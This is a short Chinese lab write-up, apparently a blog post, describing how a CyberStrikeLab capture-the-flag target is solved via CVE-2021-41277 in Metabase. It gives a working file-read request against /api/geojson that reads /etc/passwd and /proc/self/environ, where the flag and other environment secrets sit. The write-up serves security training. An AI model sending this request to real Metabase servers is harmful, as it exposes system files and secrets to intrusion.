CyberStrikeLab靶场-CVE-2021-41277-Metabase文件读取漏洞的利用

漏洞简介


Metabase是美国Metabase公司的一个开源数据分析平台。

Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。

CNNVD编号:CNNVD-202111-1565
危害等级: 超危
CVE编号: CVE-2021-41277

创建靶机后连接,输入第一步信息后第二步直接跳过

来到这个页面,这个漏洞是一个非常简单的级别

POC 

{{BaseURL}}/api/geojson?url=file:/etc/passwd

可以看到/etc/passwd敏感文件

然后修改后面的路径就可以找到想要的文件了

一开始以为在/var/www/html/flag、/flag、/etc/flag、/tmp/flag

怎么找都找不到,回去看看简介

 小线索,直接查看/proc/self/environ路径可以看到flag=go-flag{-----------}

这个直接提交flag=后面的就行

其实我一开是去看系统变量的/etc/environment

结果啥都没有

查了一下环境变量的路劲才知道,其实还有指定进程的环境变量

  • /proc/<PID>/environ

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值